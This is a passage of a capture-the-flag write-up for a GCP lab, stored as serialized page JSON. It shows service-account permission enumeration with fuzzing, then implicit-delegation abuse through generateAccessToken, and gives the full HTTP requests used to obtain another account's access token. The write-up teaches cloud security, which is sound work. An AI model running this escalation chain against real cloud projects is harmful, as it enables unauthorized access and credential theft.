roles/owner\n",{"type":33,"tag":128,"props":1164,"children":1166},{"class":130,"line":1165},24,[1167,1171],{"type":33,"tag":128,"props":1168,"children":1169},{"style":135},[1170],{"type":38,"value":907},{"type":33,"tag":128,"props":1172,"children":1173},{"style":140},[1174],{"type":38,"value":912},{"type":33,"tag":128,"props":1176,"children":1178},{"class":130,"line":1177},25,[1179,1183],{"type":33,"tag":128,"props":1180,"children":1181},{"style":135},[1182],{"type":38,"value":920},{"type":33,"tag":128,"props":1184,"children":1185},{"style":140},[1186],{"type":38,"value":1111},{"type":33,"tag":128,"props":1188,"children":1190},{"class":130,"line":1189},26,[1191,1195],{"type":33,"tag":128,"props":1192,"children":1193},{"style":135},[1194],{"type":38,"value":933},{"type":33,"tag":128,"props":1196,"children":1197},{"style":140},[1198],{"type":38,"value":1199}," roles/run.invoker\n",{"type":33,"tag":128,"props":1201,"children":1203},{"class":130,"line":1202},27,[1204,1208],{"type":33,"tag":128,"props":1205,"children":1206},{"style":135},[1207],{"type":38,"value":907},{"type":33,"tag":128,"props":1209,"children":1210},{"style":140},[1211],{"type":38,"value":912},{"type":33,"tag":128,"props":1213,"children":1215},{"class":130,"line":1214},28,[1216,1220],{"type":33,"tag":128,"props":1217,"children":1218},{"style":135},[1219],{"type":38,"value":920},{"type":33,"tag":128,"props":1221,"children":1222},{"style":140},[1223],{"type":38,"value":1111},{"type":33,"tag":128,"props":1225,"children":1227},{"class":130,"line":1226},29,[1228,1232],{"type":33,"tag":128,"props":1229,"children":1230},{"style":135},[1231],{"type":38,"value":933},{"type":33,"tag":128,"props":1233,"children":1234},{"style":140},[1235],{"type":38,"value":1236}," 
roles/secretmanager.viewer\n",{"type":33,"tag":128,"props":1238,"children":1240},{"class":130,"line":1239},30,[1241,1245],{"type":33,"tag":128,"props":1242,"children":1243},{"style":135},[1244],{"type":38,"value":907},{"type":33,"tag":128,"props":1246,"children":1247},{"style":140},[1248],{"type":38,"value":912},{"type":33,"tag":128,"props":1250,"children":1252},{"class":130,"line":1251},31,[1253,1257],{"type":33,"tag":128,"props":1254,"children":1255},{"style":135},[1256],{"type":38,"value":920},{"type":33,"tag":128,"props":1258,"children":1259},{"style":140},[1260],{"type":38,"value":925},{"type":33,"tag":128,"props":1262,"children":1264},{"class":130,"line":1263},32,[1265,1269],{"type":33,"tag":128,"props":1266,"children":1267},{"style":135},[1268],{"type":38,"value":933},{"type":33,"tag":128,"props":1270,"children":1271},{"style":140},[1272],{"type":38,"value":1273}," roles/storage.bucketViewer\n",{"type":33,"tag":128,"props":1275,"children":1277},{"class":130,"line":1276},33,[1278,1282],{"type":33,"tag":128,"props":1279,"children":1280},{"style":135},[1281],{"type":38,"value":907},{"type":33,"tag":128,"props":1283,"children":1284},{"style":140},[1285],{"type":38,"value":912},{"type":33,"tag":128,"props":1287,"children":1289},{"class":130,"line":1288},34,[1290,1294],{"type":33,"tag":128,"props":1291,"children":1292},{"style":135},[1293],{"type":38,"value":920},{"type":33,"tag":128,"props":1295,"children":1296},{"style":140},[1297],{"type":38,"value":925},{"type":33,"tag":128,"props":1299,"children":1301},{"class":130,"line":1300},35,[1302,1306],{"type":33,"tag":128,"props":1303,"children":1304},{"style":135},[1305],{"type":38,"value":933},{"type":33,"tag":128,"props":1307,"children":1308},{"style":140},[1309],{"type":38,"value":1310}," 
roles/storage.objectViewer\n",{"type":33,"tag":128,"props":1312,"children":1314},{"class":130,"line":1313},36,[1315,1320],{"type":33,"tag":128,"props":1316,"children":1317},{"style":135},[1318],{"type":38,"value":1319},"etag:",{"type":33,"tag":128,"props":1321,"children":1322},{"style":140},[1323],{"type":38,"value":1324}," BwYxzfQaKR4=\n",{"type":33,"tag":128,"props":1326,"children":1328},{"class":130,"line":1327},37,[1329,1334],{"type":33,"tag":128,"props":1330,"children":1331},{"style":135},[1332],{"type":38,"value":1333},"version:",{"type":33,"tag":128,"props":1335,"children":1336},{"style":523},[1337],{"type":38,"value":1338}," 1\n",{"type":33,"tag":47,"props":1340,"children":1341},{},[1342],{"type":38,"value":1343},"From the command output, we have both the roles and the list of service accounts, this information is really important because it will allow us to list the actions that our current service account has on other service accounts.",{"type":33,"tag":47,"props":1345,"children":1346},{},[1347],{"type":38,"value":1348},"The permissions that are relevant in our case are the following:",{"type":33,"tag":239,"props":1350,"children":1351},{},[1352,1357,1362,1367],{"type":33,"tag":243,"props":1353,"children":1354},{},[1355],{"type":38,"value":1356},"iam.serviceAccounts.getAccessToken",{"type":33,"tag":243,"props":1358,"children":1359},{},[1360],{"type":38,"value":1361},"iam.serviceAccounts.signJwt",{"type":33,"tag":243,"props":1363,"children":1364},{},[1365],{"type":38,"value":1366},"iam.serviceAccounts.implicitDelegation",{"type":33,"tag":243,"props":1368,"children":1369},{},[1370],{"type":38,"value":1371},"iam.serviceAccounts.actAs",{"type":33,"tag":47,"props":1373,"children":1374},{},[1375],{"type":38,"value":1376},"Each of them allows us to elevate our privileges horizontally to another service account.",{"type":33,"tag":47,"props":1378,"children":1379},{},[1380],{"type":38,"value":1381},"To enumerate, we can use the GCP API which allows us to know the 
permissions our service account has in relation to the target service account:",{"type":33,"tag":239,"props":1383,"children":1384},{},[1385,1396,1407,1420],{"type":33,"tag":243,"props":1386,"children":1387},{},[1388,1390],{"type":38,"value":1389},"URL: ",{"type":33,"tag":105,"props":1391,"children":1393},{"className":1392},[],[1394],{"type":38,"value":1395},"https://iam.googleapis.com/v1/projects/-/serviceAccounts/\u003CTARGET_SA>:testIamPermissions",{"type":33,"tag":243,"props":1397,"children":1398},{},[1399,1401],{"type":38,"value":1400},"Method: ",{"type":33,"tag":105,"props":1402,"children":1404},{"className":1403},[],[1405],{"type":38,"value":1406},"POST",{"type":33,"tag":243,"props":1408,"children":1409},{},[1410,1412,1418],{"type":38,"value":1411},"Mandatory header: ",{"type":33,"tag":105,"props":1413,"children":1415},{"className":1414},[],[1416],{"type":38,"value":1417},"Authorization Bearer",{"type":38,"value":1419}," with the access token from our service account.",{"type":33,"tag":243,"props":1421,"children":1422},{},[1423],{"type":38,"value":1424},"Body:",{"type":33,"tag":114,"props":1426,"children":1427},{"lang":633},[1428],{"type":33,"tag":119,"props":1429,"children":1431},{"className":637,"code":1430,"language":633,"meta":8,"style":8},"{\n  \"permissions\": [\n    \"iam.serviceAccounts.getAccessToken\",\n    \"iam.serviceAccounts.signJwt\",\n    \"iam.serviceAccounts.implicitDelegation\",\n    \"iam.serviceAccounts.actAs\"\n  
]\n}\n",[1432],{"type":33,"tag":105,"props":1433,"children":1434},{"__ignoreMap":8},[1435,1442,1467,1486,1505,1524,1539,1547],{"type":33,"tag":128,"props":1436,"children":1437},{"class":130,"line":131},[1438],{"type":33,"tag":128,"props":1439,"children":1440},{"style":312},[1441],{"type":38,"value":650},{"type":33,"tag":128,"props":1443,"children":1444},{"class":130,"line":362},[1445,1449,1454,1458,1462],{"type":33,"tag":128,"props":1446,"children":1447},{"style":656},[1448],{"type":38,"value":659},{"type":33,"tag":128,"props":1450,"children":1451},{"style":437},[1452],{"type":38,"value":1453},"permissions",{"type":33,"tag":128,"props":1455,"children":1456},{"style":656},[1457],{"type":38,"value":669},{"type":33,"tag":128,"props":1459,"children":1460},{"style":312},[1461],{"type":38,"value":284},{"type":33,"tag":128,"props":1463,"children":1464},{"style":312},[1465],{"type":38,"value":1466}," [\n",{"type":33,"tag":128,"props":1468,"children":1469},{"class":130,"line":403},[1470,1474,1478,1482],{"type":33,"tag":128,"props":1471,"children":1472},{"style":676},[1473],{"type":38,"value":771},{"type":33,"tag":128,"props":1475,"children":1476},{"style":140},[1477],{"type":38,"value":1356},{"type":33,"tag":128,"props":1479,"children":1480},{"style":676},[1481],{"type":38,"value":669},{"type":33,"tag":128,"props":1483,"children":1484},{"style":312},[1485],{"type":38,"value":693},{"type":33,"tag":128,"props":1487,"children":1488},{"class":130,"line":739},[1489,1493,1497,1501],{"type":33,"tag":128,"props":1490,"children":1491},{"style":676},[1492],{"type":38,"value":771},{"type":33,"tag":128,"props":1494,"children":1495},{"style":140},[1496],{"type":38,"value":1361},{"type":33,"tag":128,"props":1498,"children":1499},{"style":676},[1500],{"type":38,"value":669},{"type":33,"tag":128,"props":1502,"children":1503},{"style":312},[1504],{"type":38,"value":693},{"type":33,"tag":128,"props":1506,"children":1507},{"class":130,"line":765},[1508,1512,1516,1520],{"type":33,"tag":128,"pro
ps":1509,"children":1510},{"style":676},[1511],{"type":38,"value":771},{"type":33,"tag":128,"props":1513,"children":1514},{"style":140},[1515],{"type":38,"value":1366},{"type":33,"tag":128,"props":1517,"children":1518},{"style":676},[1519],{"type":38,"value":669},{"type":33,"tag":128,"props":1521,"children":1522},{"style":312},[1523],{"type":38,"value":693},{"type":33,"tag":128,"props":1525,"children":1526},{"class":130,"line":804},[1527,1531,1535],{"type":33,"tag":128,"props":1528,"children":1529},{"style":676},[1530],{"type":38,"value":771},{"type":33,"tag":128,"props":1532,"children":1533},{"style":140},[1534],{"type":38,"value":1371},{"type":33,"tag":128,"props":1536,"children":1537},{"style":676},[1538],{"type":38,"value":836},{"type":33,"tag":128,"props":1540,"children":1541},{"class":130,"line":839},[1542],{"type":33,"tag":128,"props":1543,"children":1544},{"style":312},[1545],{"type":38,"value":1546},"  ]\n",{"type":33,"tag":128,"props":1548,"children":1549},{"class":130,"line":848},[1550],{"type":33,"tag":128,"props":1551,"children":1552},{"style":312},[1553],{"type":38,"value":854},{"type":33,"tag":47,"props":1555,"children":1556},{},[1557],{"type":38,"value":1558},"Here is an example of an HTTP request:",{"type":33,"tag":114,"props":1560,"children":1562},{"lang":1561},"http",[1563],{"type":33,"tag":119,"props":1564,"children":1567},{"className":1565,"code":1566,"language":1561,"meta":8,"style":8},"language-http shiki shiki-themes vitesse-dark","POST /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:testIamPermissions HTTP/2\nHost: iam.googleapis.com\nAuthorization: Bearer ya29.c.c0ASRK0GYygwCJiA5fIL05[..SNIP..]95utqtFJgtFu\nAccept: */*\nContent-Type: application/json\nContent-Length: 159\n\n{\n  \"permissions\": [\n    \"iam.serviceAccounts.getAccessToken\",\n    \"iam.serviceAccounts.signJwt\",\n    \"iam.serviceAccounts.implicitDelegation\",\n    \"iam.serviceAccounts.actAs\"\n    
]\n}\n",[1568],{"type":33,"tag":105,"props":1569,"children":1570},{"__ignoreMap":8},[1571,1584,1597,1610,1623,1636,1649,1656,1663,1686,1705,1724,1743,1758,1766],{"type":33,"tag":128,"props":1572,"children":1573},{"class":130,"line":131},[1574,1579],{"type":33,"tag":128,"props":1575,"children":1577},{"style":1576},"--shiki-default:#4D9375",[1578],{"type":38,"value":1406},{"type":33,"tag":128,"props":1580,"children":1581},{"style":323},[1582],{"type":38,"value":1583}," /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:testIamPermissions HTTP/2\n",{"type":33,"tag":128,"props":1585,"children":1586},{"class":130,"line":362},[1587,1592],{"type":33,"tag":128,"props":1588,"children":1589},{"style":1576},[1590],{"type":38,"value":1591},"Host:",{"type":33,"tag":128,"props":1593,"children":1594},{"style":140},[1595],{"type":38,"value":1596}," iam.googleapis.com\n",{"type":33,"tag":128,"props":1598,"children":1599},{"class":130,"line":403},[1600,1605],{"type":33,"tag":128,"props":1601,"children":1602},{"style":1576},[1603],{"type":38,"value":1604},"Authorization:",{"type":33,"tag":128,"props":1606,"children":1607},{"style":140},[1608],{"type":38,"value":1609}," Bearer ya29.c.c0ASRK0GYygwCJiA5fIL05[..SNIP..]95utqtFJgtFu\n",{"type":33,"tag":128,"props":1611,"children":1612},{"class":130,"line":739},[1613,1618],{"type":33,"tag":128,"props":1614,"children":1615},{"style":1576},[1616],{"type":38,"value":1617},"Accept:",{"type":33,"tag":128,"props":1619,"children":1620},{"style":140},[1621],{"type":38,"value":1622}," */*\n",{"type":33,"tag":128,"props":1624,"children":1625},{"class":130,"line":765},[1626,1631],{"type":33,"tag":128,"props":1627,"children":1628},{"style":1576},[1629],{"type":38,"value":1630},"Content-Type:",{"type":33,"tag":128,"props":1632,"children":1633},{"style":140},[1634],{"type":38,"value":1635}," 
application/json\n",{"type":33,"tag":128,"props":1637,"children":1638},{"class":130,"line":804},[1639,1644],{"type":33,"tag":128,"props":1640,"children":1641},{"style":1576},[1642],{"type":38,"value":1643},"Content-Length:",{"type":33,"tag":128,"props":1645,"children":1646},{"style":140},[1647],{"type":38,"value":1648}," 159\n",{"type":33,"tag":128,"props":1650,"children":1651},{"class":130,"line":839},[1652],{"type":33,"tag":128,"props":1653,"children":1654},{"emptyLinePlaceholder":896},[1655],{"type":38,"value":899},{"type":33,"tag":128,"props":1657,"children":1658},{"class":130,"line":848},[1659],{"type":33,"tag":128,"props":1660,"children":1661},{"style":312},[1662],{"type":38,"value":650},{"type":33,"tag":128,"props":1664,"children":1665},{"class":130,"line":976},[1666,1670,1674,1678,1682],{"type":33,"tag":128,"props":1667,"children":1668},{"style":656},[1669],{"type":38,"value":659},{"type":33,"tag":128,"props":1671,"children":1672},{"style":437},[1673],{"type":38,"value":1453},{"type":33,"tag":128,"props":1675,"children":1676},{"style":656},[1677],{"type":38,"value":669},{"type":33,"tag":128,"props":1679,"children":1680},{"style":312},[1681],{"type":38,"value":284},{"type":33,"tag":128,"props":1683,"children":1684},{"style":312},[1685],{"type":38,"value":1466},{"type":33,"tag":128,"props":1687,"children":1688},{"class":130,"line":988},[1689,1693,1697,1701],{"type":33,"tag":128,"props":1690,"children":1691},{"style":676},[1692],{"type":38,"value":771},{"type":33,"tag":128,"props":1694,"children":1695},{"style":140},[1696],{"type":38,"value":1356},{"type":33,"tag":128,"props":1698,"children":1699},{"style":676},[1700],{"type":38,"value":669},{"type":33,"tag":128,"props":1702,"children":1703},{"style":312},[1704],{"type":38,"value":693},{"type":33,"tag":128,"props":1706,"children":1707},{"class":130,"line":1001},[1708,1712,1716,1720],{"type":33,"tag":128,"props":1709,"children":1710},{"style":676},[1711],{"type":38,"value":771},{"type":33,"tag":128,"props":1713,
"children":1714},{"style":140},[1715],{"type":38,"value":1361},{"type":33,"tag":128,"props":1717,"children":1718},{"style":676},[1719],{"type":38,"value":669},{"type":33,"tag":128,"props":1721,"children":1722},{"style":312},[1723],{"type":38,"value":693},{"type":33,"tag":128,"props":1725,"children":1726},{"class":130,"line":1014},[1727,1731,1735,1739],{"type":33,"tag":128,"props":1728,"children":1729},{"style":676},[1730],{"type":38,"value":771},{"type":33,"tag":128,"props":1732,"children":1733},{"style":140},[1734],{"type":38,"value":1366},{"type":33,"tag":128,"props":1736,"children":1737},{"style":676},[1738],{"type":38,"value":669},{"type":33,"tag":128,"props":1740,"children":1741},{"style":312},[1742],{"type":38,"value":693},{"type":33,"tag":128,"props":1744,"children":1745},{"class":130,"line":1026},[1746,1750,1754],{"type":33,"tag":128,"props":1747,"children":1748},{"style":676},[1749],{"type":38,"value":771},{"type":33,"tag":128,"props":1751,"children":1752},{"style":140},[1753],{"type":38,"value":1371},{"type":33,"tag":128,"props":1755,"children":1756},{"style":676},[1757],{"type":38,"value":836},{"type":33,"tag":128,"props":1759,"children":1760},{"class":130,"line":1038},[1761],{"type":33,"tag":128,"props":1762,"children":1763},{"style":312},[1764],{"type":38,"value":1765},"    ]\n",{"type":33,"tag":128,"props":1767,"children":1768},{"class":130,"line":1051},[1769],{"type":33,"tag":128,"props":1770,"children":1771},{"style":312},[1772],{"type":38,"value":854},{"type":33,"tag":47,"props":1774,"children":1775},{},[1776],{"type":38,"value":1777},"The response will contain the permissions that our service account has on the target service account.",{"type":33,"tag":47,"props":1779,"children":1780},{},[1781],{"type":38,"value":1782},"You will need to go through each service account with this request to determine if our service account has one or several of these permissions on another service account. 
Personally, I use Burp's Intruder but it's possible to make a custom bash script or use ffuf.",{"type":33,"tag":75,"props":1784,"children":1786},{"imgSrc":1785,":width":78},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743699663/writeups/pwnedlabs-gcp-challenge/intruder-enum-perms.webp",[],{"type":33,"tag":47,"props":1788,"children":1789},{},[1790,1792,1798],{"type":38,"value":1791},"After our enumeration, we can see that one of the requests has a longer return size than the others and we can see that we have implicit delegation rights on the service account ",{"type":33,"tag":105,"props":1793,"children":1795},{"className":1794},[],[1796],{"type":38,"value":1797},"sql-424@gr-proj-4.iam.gserviceaccount.com",{"type":38,"value":215},{"type":33,"tag":75,"props":1800,"children":1802},{"imgSrc":1801},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743699775/writeups/pwnedlabs-gcp-challenge/result-intruder-enum-first.webp",[],{"type":33,"tag":47,"props":1804,"children":1805},{},[1806],{"type":38,"value":1807},"In the following chapter, we will detail the implicit delegation attack path to escalate our privileges horizontally.",{"type":33,"tag":40,"props":1809,"children":1811},{"id":1810},"implicit-delegation",[1812],{"type":38,"value":1813},"Implicit delegation",{"type":33,"tag":47,"props":1815,"children":1816},{},[1817,1819,1826],{"type":38,"value":1818},"Before we begin, I invite you to read the ",{"type":33,"tag":53,"props":1820,"children":1823},{"href":1821,"rel":1822},"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1",[57],[1824],{"type":38,"value":1825},"rhinosecurity article",{"type":38,"value":1827}," about privilege escalation methods on GCP, where a section is dedicated to implicit delegation.",{"type":33,"tag":47,"props":1829,"children":1830},{},[1831],{"type":38,"value":1832},"What does the privilege escalation scenario via implicit delegation permission consist 
of?",{"type":33,"tag":47,"props":1834,"children":1835},{},[1836,1838,1844,1846,1852],{"type":38,"value":1837},"Implicit delegation occurs when a service account A has ",{"type":33,"tag":105,"props":1839,"children":1841},{"className":1840},[],[1842],{"type":38,"value":1843},"implicitDelegation",{"type":38,"value":1845}," rights on a service account B which itself has ",{"type":33,"tag":105,"props":1847,"children":1849},{"className":1848},[],[1850],{"type":38,"value":1851},"getAccessToken",{"type":38,"value":1853}," rights on a service account C.",{"type":33,"tag":47,"props":1855,"children":1856},{},[1857],{"type":38,"value":1858},"So in our case we have this diagram:",{"type":33,"tag":75,"props":1860,"children":1863},{"imgSrc":1861,":width":1862},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743719479/writeups/pwnedlabs-gcp-challenge/implicit-delegation.webp","500",[],{"type":33,"tag":47,"props":1865,"children":1866},{},[1867],{"type":38,"value":1868},"To exploit this attack path, we will also go through the GCP API to get the access token of the service account 
C:",{"type":33,"tag":239,"props":1870,"children":1871},{},[1872,1882,1891,1901],{"type":33,"tag":243,"props":1873,"children":1874},{},[1875,1876],{"type":38,"value":1389},{"type":33,"tag":105,"props":1877,"children":1879},{"className":1878},[],[1880],{"type":38,"value":1881},"https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/\u003CTARGET_SA>:generateAccessToken",{"type":33,"tag":243,"props":1883,"children":1884},{},[1885,1886],{"type":38,"value":1400},{"type":33,"tag":105,"props":1887,"children":1889},{"className":1888},[],[1890],{"type":38,"value":1406},{"type":33,"tag":243,"props":1892,"children":1893},{},[1894,1895,1900],{"type":38,"value":1411},{"type":33,"tag":105,"props":1896,"children":1898},{"className":1897},[],[1899],{"type":38,"value":1417},{"type":38,"value":1419},{"type":33,"tag":243,"props":1902,"children":1903},{},[1904],{"type":38,"value":1424},{"type":33,"tag":114,"props":1906,"children":1907},{"lang":633},[1908],{"type":33,"tag":119,"props":1909,"children":1911},{"className":637,"code":1910,"language":633,"meta":8,"style":8},"{\n  \"delegates\": [\"projects/-/serviceAccounts/sql-424@gr-proj-4.iam.gserviceaccount.com\"],\n  \"scope\": [\"https://www.googleapis.com/auth/cloud-platform\"] 
\n}\n",[1912],{"type":33,"tag":105,"props":1913,"children":1914},{"__ignoreMap":8},[1915,1922,1963,2009],{"type":33,"tag":128,"props":1916,"children":1917},{"class":130,"line":131},[1918],{"type":33,"tag":128,"props":1919,"children":1920},{"style":312},[1921],{"type":38,"value":650},{"type":33,"tag":128,"props":1923,"children":1924},{"class":130,"line":362},[1925,1929,1934,1938,1942,1946,1950,1955,1959],{"type":33,"tag":128,"props":1926,"children":1927},{"style":656},[1928],{"type":38,"value":659},{"type":33,"tag":128,"props":1930,"children":1931},{"style":437},[1932],{"type":38,"value":1933},"delegates",{"type":33,"tag":128,"props":1935,"children":1936},{"style":656},[1937],{"type":38,"value":669},{"type":33,"tag":128,"props":1939,"children":1940},{"style":312},[1941],{"type":38,"value":284},{"type":33,"tag":128,"props":1943,"children":1944},{"style":312},[1945],{"type":38,"value":718},{"type":33,"tag":128,"props":1947,"children":1948},{"style":676},[1949],{"type":38,"value":669},{"type":33,"tag":128,"props":1951,"children":1952},{"style":140},[1953],{"type":38,"value":1954},"projects/-/serviceAccounts/sql-424@gr-proj-4.iam.gserviceaccount.com",{"type":33,"tag":128,"props":1956,"children":1957},{"style":676},[1958],{"type":38,"value":669},{"type":33,"tag":128,"props":1960,"children":1961},{"style":312},[1962],{"type":38,"value":736},{"type":33,"tag":128,"props":1964,"children":1965},{"class":130,"line":403},[1966,1970,1975,1979,1983,1987,1991,1996,2000,2004],{"type":33,"tag":128,"props":1967,"children":1968},{"style":656},[1969],{"type":38,"value":659},{"type":33,"tag":128,"props":1971,"children":1972},{"style":437},[1973],{"type":38,"value":1974},"scope",{"type":33,"tag":128,"props":1976,"children":1977},{"style":656},[1978],{"type":38,"value":669},{"type":33,"tag":128,"props":1980,"children":1981},{"style":312},[1982],{"type":38,"value":284},{"type":33,"tag":128,"props":1984,"children":1985},{"style":312},[1986],{"type":38,"value":718},{"type":33,"tag":128,"props
":1988,"children":1989},{"style":676},[1990],{"type":38,"value":669},{"type":33,"tag":128,"props":1992,"children":1993},{"style":140},[1994],{"type":38,"value":1995},"https://www.googleapis.com/auth/cloud-platform",{"type":33,"tag":128,"props":1997,"children":1998},{"style":676},[1999],{"type":38,"value":669},{"type":33,"tag":128,"props":2001,"children":2002},{"style":312},[2003],{"type":38,"value":354},{"type":33,"tag":128,"props":2005,"children":2006},{"style":323},[2007],{"type":38,"value":2008}," \n",{"type":33,"tag":128,"props":2010,"children":2011},{"class":130,"line":739},[2012],{"type":33,"tag":128,"props":2013,"children":2014},{"style":312},[2015],{"type":38,"value":854},{"type":33,"tag":47,"props":2017,"children":2018},{},[2019],{"type":38,"value":1558},{"type":33,"tag":114,"props":2021,"children":2022},{"lang":1561},[2023],{"type":33,"tag":119,"props":2024,"children":2026},{"className":1565,"code":2025,"language":1561,"meta":8,"style":8},"POST /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:generateAccessToken HTTP/2\nHost: iamcredentials.googleapis.com\nAuthorization: Bearer ya29.c.c0ASRK0GYygwCJiA5fIL05[..SNIP..]95utqtFJgtFu\nAccept: */*\nContent-Type: application/json\nContent-Length: 149\n\n{\n  \"delegates\":[\n    \"projects/-/serviceAccounts/sql-424@gr-proj-4.iam.gserviceaccount.com\"\n  ],\n  \"scope\": [\n    \"https://www.googleapis.com/auth/cloud-platform\"\n  ]\n}\n",[2027],{"type":33,"tag":105,"props":2028,"children":2029},{"__ignoreMap":8},[2030,2042,2054,2065,2076,2087,2099,2106,2113,2133,2148,2156,2179,2194,2201],{"type":33,"tag":128,"props":2031,"children":2032},{"class":130,"line":131},[2033,2037],{"type":33,"tag":128,"props":2034,"children":2035},{"style":1576},[2036],{"type":38,"value":1406},{"type":33,"tag":128,"props":2038,"children":2039},{"style":323},[2040],{"type":38,"value":2041}," /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:generateAccessToken 
HTTP/2\n",{"type":33,"tag":128,"props":2043,"children":2044},{"class":130,"line":362},[2045,2049],{"type":33,"tag":128,"props":2046,"children":2047},{"style":1576},[2048],{"type":38,"value":1591},{"type":33,"tag":128,"props":2050,"children":2051},{"style":140},[2052],{"type":38,"value":2053}," iamcredentials.googleapis.com\n",{"type":33,"tag":128,"props":2055,"children":2056},{"class":130,"line":403},[2057,2061],{"type":33,"tag":128,"props":2058,"children":2059},{"style":1576},[2060],{"type":38,"value":1604},{"type":33,"tag":128,"props":2062,"children":2063},{"style":140},[2064],{"type":38,"value":1609},{"type":33,"tag":128,"props":2066,"children":2067},{"class":130,"line":739},[2068,2072],{"type":33,"tag":128,"props":2069,"children":2070},{"style":1576},[2071],{"type":38,"value":1617},{"type":33,"tag":128,"props":2073,"children":2074},{"style":140},[2075],{"type":38,"value":1622},{"type":33,"tag":128,"props":2077,"children":2078},{"class":130,"line":765},[2079,2083],{"type":33,"tag":128,"props":2080,"children":2081},{"style":1576},[2082],{"type":38,"value":1630},{"type":33,"tag":128,"props":2084,"children":2085},{"style":140},[2086],{"type":38,"value":1635},{"type":33,"tag":128,"props":2088,"children":2089},{"class":130,"line":804},[2090,2094],{"type":33,"tag":128,"props":2091,"children":2092},{"style":1576},[2093],{"type":38,"value":1643},{"type":33,"tag":128,"props":2095,"children":2096},{"style":140},[2097],{"type":38,"value":2098}," 
149\n",{"type":33,"tag":128,"props":2100,"children":2101},{"class":130,"line":839},[2102],{"type":33,"tag":128,"props":2103,"children":2104},{"emptyLinePlaceholder":896},[2105],{"type":38,"value":899},{"type":33,"tag":128,"props":2107,"children":2108},{"class":130,"line":848},[2109],{"type":33,"tag":128,"props":2110,"children":2111},{"style":312},[2112],{"type":38,"value":650},{"type":33,"tag":128,"props":2114,"children":2115},{"class":130,"line":976},[2116,2120,2124,2128],{"type":33,"tag":128,"props":2117,"children":2118},{"style":656},[2119],{"type":38,"value":659},{"type":33,"tag":128,"props":2121,"children":2122},{"style":437},[2123],{"type":38,"value":1933},{"type":33,"tag":128,"props":2125,"children":2126},{"style":656},[2127],{"type":38,"value":669},{"type":33,"tag":128,"props":2129,"children":2130},{"style":312},[2131],{"type":38,"value":2132},":[\n",{"type":33,"tag":128,"props":2134,"children":2135},{"class":130,"line":988},[2136,2140,2144],{"type":33,"tag":128,"props":2137,"children":2138},{"style":676},[2139],{"type":38,"value":771},{"type":33,"tag":128,"props":2141,"children":2142},{"style":140},[2143],{"type":38,"value":1954},{"type":33,"tag":128,"props":2145,"children":2146},{"style":676},[2147],{"type":38,"value":836},{"type":33,"tag":128,"props":2149,"children":2150},{"class":130,"line":1001},[2151],{"type":33,"tag":128,"props":2152,"children":2153},{"style":312},[2154],{"type":38,"value":2155},"  
],\n",{"type":33,"tag":128,"props":2157,"children":2158},{"class":130,"line":1014},[2159,2163,2167,2171,2175],{"type":33,"tag":128,"props":2160,"children":2161},{"style":656},[2162],{"type":38,"value":659},{"type":33,"tag":128,"props":2164,"children":2165},{"style":437},[2166],{"type":38,"value":1974},{"type":33,"tag":128,"props":2168,"children":2169},{"style":656},[2170],{"type":38,"value":669},{"type":33,"tag":128,"props":2172,"children":2173},{"style":312},[2174],{"type":38,"value":284},{"type":33,"tag":128,"props":2176,"children":2177},{"style":312},[2178],{"type":38,"value":1466},{"type":33,"tag":128,"props":2180,"children":2181},{"class":130,"line":1026},[2182,2186,2190],{"type":33,"tag":128,"props":2183,"children":2184},{"style":676},[2185],{"type":38,"value":771},{"type":33,"tag":128,"props":2187,"children":2188},{"style":140},[2189],{"type":38,"value":1995},{"type":33,"tag":128,"props":2191,"children":2192},{"style":676},[2193],{"type":38,"value":836},{"type":33,"tag":128,"props":2195,"children":2196},{"class":130,"line":1038},[2197],{"type":33,"tag":128,"props":2198,"children":2199},{"style":312},[2200],{"type":38,"value":1546},{"type":33,"tag":128,"props":2202,"children":2203},{"class":130,"line":1051},[2204],{"type":33,"tag":128,"props":2205,"children":2206},{"style":312},[2207],{"type":38,"value":854},{"type":33,"tag":47,"props":2209,"children":2210},{},[2211],{"type":38,"value":2212},"The response will contain the access token of the service account C.",{"type":33,"tag":47,"props":2214,"children":2215},{},[2216,2218,2224],{"type":38,"value":2217},"In our case, we don't know if the ",{"type":33,"tag":105,"props":2219,"children":2221},{"className":2220},[],[2222],{"type":38,"value":2223},"sql-424",{"type":38,"value":2225}," service account has getAccessToken rights on another service account, similar to enumeration parts we will need to fuzz with the service accounts that we are 
targeting.",{"type":33,"tag":75,"props":2227,"children":2229},{"imgSrc":2228,":width":78},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743700878/writeups/pwnedlabs-gcp-challenge/implicit-delegation-intruder.webp",[],{"type":33,"tag":47,"props":2231,"children":2232},{},[2233,2235,2240,2242,2247,2249,2255],{"type":38,"value":2234},"After our fuzzing, we can see that the service account ",{"type":33,"tag":105,"props":2236,"children":2238},{"className":2237},[],[2239],{"type":38,"value":2223},{"type":38,"value":2241}," has the ",{"type":33,"tag":105,"props":2243,"children":2245},{"className":2244},[],[2246],{"type":38,"value":1851},{"type":38,"value":2248}," permission on the ",{"type":33,"tag":105,"props":2250,"children":2252},{"className":2251},[],[2253],{"type":38,"value":2254},"analytics",{"type":38,"value":2256}," service account, which allowed us to retrieve its token.",{"type":33,"tag":75,"props":2258,"children":2260},{"imgSrc":2259,":width":78},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743701439/writeups/pwnedlabs-gcp-challenge/intruder-implicit-delegation-result.webp",[],{"type":33,"tag":47,"props":2262,"children":2263},{},[2264],{"type":38,"value":2265},"Now that we have a service account, we can repeat the enumeration process by fuzzing the permissions that our service account has on other service accounts.",{"type":33,"tag":75,"props":2267,"children":2269},{"imgSrc":2268,":width":78},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743717471/writeups/pwnedlabs-gcp-challenge/result-intruder-enum-second.webp",[],{"type":33,"tag":47,"props":2271,"children":2272},{},[2273,2275,2280,2282,2288],{"type":38,"value":2274},"We can see that our new ",{"type":33,"tag":105,"props":2276,"children":2278},{"className":2277},[],[2279],{"type":38,"value":2254},{"type":38,"value":2281}," service account has signJwt permissions on the 
